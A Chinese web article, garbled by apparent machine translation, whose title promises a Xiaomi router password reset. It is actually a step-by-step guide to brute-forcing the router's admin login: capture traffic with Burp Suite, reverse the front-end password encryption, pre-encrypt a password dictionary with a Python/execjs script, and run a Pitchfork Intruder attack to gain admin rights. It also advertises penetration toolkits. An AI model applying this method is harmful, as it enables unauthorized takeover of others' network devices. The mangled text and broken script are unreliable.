小米路由管理密码重置,小米路由器如何重置管理密码

  小米路由管理密码重置,小米路由器如何重置管理密码

  更多渗透技巧,10多本电子书,渗透工具包,搜索微信官方账号:白帽子左边目标路由器管理员密码未知,根据已有字典管理员密码炸了。

  工具:burpsuite

  脚本语言:python3.7

  1.数据包分析并输入小米路由器管理员的接口地址192.168.31.1。

  未知的管理员密码。

  输入测试密码:123。

  用burpsuite抓住袋子两次,看看结果。

  第一包的结果:

  第二套方案的结果:

  即使您两次输入相同的密码123,您也可以看到发送到服务器的密码和nonce字段是不同的。

  可以判断输入的密码是加密的,有随机数。你不能用字典直接把它炸了。您必须加密字典并附加随机数nonce。

  2.源代码读取前端源代码

  选择f12页面中的元素并查看按钮id:btnRtSubmit。

  在调试器web文件中,查找按钮btnRtSubmit调用的方法。

  发现方法是登录手。

  浏览登录握手源代码

  发现密码被Encrypt加密了。

  显示Encrpty.oldPwd方法的源代码。

  发现oldPwd方法调用了目录中的两个源文件:aes.js和sha1.js

  3.因为要编写脚本代码,所以计划用python脚本调用js,加密字典中的数据,并将返回值设置为password和nonce。

  JS代码(Encrypt.js)更改如下:

  修改功能登录

  传递的值是在前端文本框中输入的值,输出值是oldPwd函数输出的值(capture中的密码值)和Encrypt方法初始化时生成的nonce。

  将oldPwd使用的Encrypt和CryptoJS方法写入同一个JS文件,并显示代码的截屏。

  Python脚本如下

  导入程序

  导入importexecjs#pyexecjs库

  Get _ js(导入:# js文件

  f=open(「encrypt.js "、" r "、encoding=utf-8 ))

  line=f.readline())

  hml str=

  while行:

  htmlstr=htmlstr行

  line=f.readline())

  返回htmlstr

  jsstr=get_js()

  CTX=execjs.compile(jsstr))。

  Def creative _ book(创建:#加密密码字典

  f=open(「top100pwd.txt )

  对于f中的行:

  r=line.strip ()n))

  UTF=CTX.call(loginhandle),r)).

  h=open(adobe _ top 100 _ pass _ creative . txt, a ))

  h1=open(adobe _ top 100 _ pass _ creative _ random . txt, a ))

  h.write((n ) utf[0])()))))))))))))))).

  h1 . write((n)URL lib . parse . quote(utf[1]))).

  print(utf[0],urllib.parse.quote ) (utf[1])

  h.close())

  h1.close().

  f.close()

  创意_书(

  生成两个字典adobe_top100_pass_creative.txt和adobe _ top 100 _ pass _ creative _ random . txt。

  密码和密码分开保管。

  下面截图

  4.以上步骤完成后,生成必要的字典,burpsuite攻击开始。

  将捕获的数据包发送给入侵者。

  选择Pitchfork,要炸开的字段是password和nonce。

  在有效负载上加载两个字典

  点击开始攻击开始攻击。

  攻击完成后,点击长度列表,找到异常长度。

  显示此请求包的响应包。

  代码字段为0,表示具有正确密码的令牌已经分发。

  将密码和nonce字段更改为Payload1和Payload2以释放包。

  获得管理员权限。

  

源代码

  3359 github.com/h2so 0o 4/admin _侵入者

  资料来源:http://33h.co/w8f8i.

  参考数据

  3359 blog.csdn.net/x1 t02m/文章/详情/81949572

  3359 t0data . git books.io/burp套件/内容/第8章。超文本标记语言

小米路由管理密码重置,小米路由器如何重置管理密码